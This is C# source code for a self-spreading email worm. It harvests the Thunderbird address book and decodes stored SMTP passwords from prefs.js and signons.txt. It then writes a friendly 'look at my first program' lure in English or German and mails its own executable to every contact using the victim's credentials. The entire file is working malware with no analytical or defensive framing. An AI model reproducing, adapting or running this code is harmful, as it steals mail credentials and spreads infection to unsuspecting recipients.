/* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; version 2 only. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ using System; using System.Globalization; using System.Threading; using System.IO; using System.Collections; using System.Text; using System.Text.RegularExpressions; using System.Net; using System.Net.Mail; using System.Reflection; using System.Diagnostics; namespace akikaze { class gather { /*Gathers various information of the targeted machine*/ public PlatformID os; public string user; public string lang; public string homefolder; public string defaultdir; private StreamReader addressfile; public bool available = true; public ArrayList addresses = new ArrayList(); public DirectoryInfo thunderbirddir; private void getabook() { try { if (os == PlatformID.Unix) { homefolder = Environment.GetFolderPath(Environment.SpecialFolder.Personal); DirectoryInfo homedir = new DirectoryInfo(homefolder); if (homedir.GetDirectories(".thunderbird").Length != 0) { /* Standard Unix-System */ thunderbirddir = new DirectoryInfo(homefolder + "/.thunderbird"); defaultdir = thunderbirddir.GetDirectories("*default")[0].ToString() + "/"; FileInfo adds = new FileInfo(defaultdir + "abook.mab"); addressfile = adds.OpenText(); } else if (homedir.GetDirectories(".thunderbird").Length != 0) { /* MacOS X */ thunderbirddir = new DirectoryInfo(homefolder + "/Library/Thunderbird/Profiles/" + user); defaultdir = thunderbirddir.GetDirectories("*slt")[0].ToString() + "/"; FileInfo adds = new FileInfo(defaultdir + "abook.mab"); addressfile = adds.OpenText(); } } else if (os == PlatformID.Win32NT) { /* WinXP code*/ Process[] processes = Process.GetProcessesByName("THUNDE~1"); foreach (Process pr in processes) { pr.Kill(); } Thread.Sleep(1000); homefolder = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); thunderbirddir = new DirectoryInfo(homefolder + "\\Thunderbird\\Profiles\\"); defaultdir = thunderbirddir.GetDirectories()[0].ToString() + "\\"; FileInfo adds = new FileInfo(thunderbirddir + defaultdir + "abook.mab"); addressfile = adds.OpenText(); } else available = false; } catch (Exception e) { available = false; } } public void formatadds() { Regex mail = new Regex(".*@.*\\..*", RegexOptions.None); Regex separate = new Regex("=|\\)", RegexOptions.None); foreach (string part in separate.Split(addressfile.ReadToEnd())) { if (mail.IsMatch(part)) addresses.Add(part); } } public gather() { os = Environment.OSVersion.Platform; user = Environment.UserName; lang = Thread.CurrentThread.CurrentCulture.TwoLetterISOLanguageName; getabook(); if (available) formatadds(); else Environment.Exit(1); } } class create { /* Create the message to send out depending on various informations */ private string title_en = "Programming"; private string title_de = "Programmierung"; private string title_default = "Programming"; private string content_average_en = "Hi, \nI have recently started to try out programming! \nThis is one of my first programms. What do you think of it?"; private string content_average_de = "Hi, \nich habe neulich angefangen zu programmieren! \nDas hier ist eines meiner ersten Programme. Was hältst du davon?"; private string content_average_default = "Hi, \nI have recently started to try out programming! \nThis is one of my first programms. What do you think of it?"; private string content_pro_en = "Hi, \nI wrote this program using a new approach. Please tell me what you think of it."; private string content_pro_de = "Hi, \nIch habe beim Schreiben dieses Programms einen neuen Ansatz verfolgt. Sag mir bitte was du davon hälts."; private string content_pro_default = "Hi, \nI wrote this program using a new approach. Please tell me what you think of it."; private string content_notwin_en = "\nIf the programm should not work instantly on your non-windows-system you probably need to execute it using mono. (mono-project.com)"; private string content_notwin_de = "\nWenn diese Programm sich auf deinem Nicht-Windows-System nich direkt ausführen lassen sollte musst du es wahrscheinlich durch Mono ausführen! (mono-project.com)"; private string content_notwin_default = "\nIf the programm should not work instantly on your non-windows-system you probably need to execute it using mono. (mono-project.com)"; public string content; public string title; private string getlang(string address) { /* Return expected receiver's language */ if (address.EndsWith("de")) return "de"; else if (address.EndsWith("com") || address.EndsWith("co.uk")) return "en"; /* More languages to be supported go here */ else return "default"; } private bool getskill() { /* Determines if the current user is a professional by checking for the programs GCC and Visual Studio */ bool result = false; if (Go.info.os == PlatformID.Unix) { Regex separate = new Regex(":|;", RegexOptions.None); string[] syspath = separate.Split(Environment.GetEnvironmentVariable("PATH")); foreach (string foo in syspath) { if (File.Exists(foo + "/gcc")) result = true; } } else { DirectoryInfo[] programs = new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)).GetDirectories(); foreach (DirectoryInfo program in programs) { if (program.ToString().Contains("Visual Studio")) result = true; } } return result; } public create(string address) { if (getlang(address) == "de" && Go.info.lang == "de") { if (getskill()) content = content_pro_de; else content = content_average_de; if (Go.info.os == PlatformID.Unix) content += content_notwin_de; title = title_de; } else if (getlang(address) == "en" && Go.info.lang == "en") { if (getskill()) content = content_pro_en; else content = content_average_en; if (Go.info.os == PlatformID.Unix) content += content_notwin_en; title = title_en; } else { if (getskill()) content = content_pro_default; else content = content_average_default; if (Go.info.os == PlatformID.Unix) content += content_notwin_default; title = title_default; } } } class attack { private string host; private int port = 25; private string user; private string password_base64; private string password; private string content; private string signon_content; private Regex separate1; private FileInfo prefs; private FileInfo signons; public attack() { if (Go.info.os == PlatformID.Win32NT) { prefs = new FileInfo(Go.info.thunderbirddir + Go.info.defaultdir + "prefs.js"); signons = new FileInfo(Go.info.thunderbirddir + Go.info.defaultdir + "signons.txt"); } else { prefs = new FileInfo(Go.info.defaultdir + "prefs.js"); signons = new FileInfo(Go.info.defaultdir + "signons.txt"); } StreamReader settings = prefs.OpenText(); content = settings.ReadToEnd(); StreamReader passread = signons.OpenText(); signon_content = passread.ReadToEnd(); } public bool check_smtp() { if (content.Contains("mail.smtpserver.smtp1")) return true; else return false; } public void getdata() { if (Go.info.os == PlatformID.Win32NT) separate1 = new Regex("\\);\r\nuser_pref\\(\"", RegexOptions.None); else separate1 = new Regex("\\);\nuser_pref\\(\"", RegexOptions.None); Regex separate2 = new Regex(", "); Regex separate3 = new Regex("\\n"); string[] nuser_pref = separate1.Split(content); foreach (string pref in nuser_pref) { if (pref.Contains("mail.smtpserver.smtp1.port")) port = Convert.ToInt32(separate2.Split(pref)[1].Replace("\"", "")); else if (pref.Contains("mail.smtpserver.smtp1.hostname")) host = separate2.Split(pref)[1].Replace("\"", ""); else if (pref.Contains("mail.smtpserver.smtp1.username")) user = separate2.Split(pref)[1].Replace("\"", ""); } string[] signon_list = separate3.Split(signon_content); int i = 0; while (i < signon_list.Length) { if (signon_list[i].Contains("smtp://" + user.Replace("@", "%40") + "@" + host)) { password_base64 = signon_list[i + 4].Replace("~", ""); break; } i++; } password = Encoding.ASCII.GetString(Convert.FromBase64String(password_base64)); } public void sendmail(string address, string content, string title) { SmtpClient smtp = new SmtpClient(host, port); if (password != null) { smtp.Credentials = new NetworkCredential(user, password); } smtp.DeliveryMethod = SmtpDeliveryMethod.Network; MailMessage message = new MailMessage(); message.From = new MailAddress(user.Replace("@" + host, "") + "@" + host); message.To.Add(address); message.Subject = title; message.Body = content; message.BodyEncoding = Encoding.UTF8; message.Attachments.Add(new Attachment(Assembly.GetEntryAssembly().Location)); smtp.Send(message); } } class Go { static public gather info = new gather(); static void Main(string[] args) { attack server = new attack(); if (server.check_smtp()) server.getdata(); else Environment.Exit(1); foreach (string mail in info.addresses.ToArray()) { create content = new create(mail); server.sendmail(mail, content.content, content.title); } } } }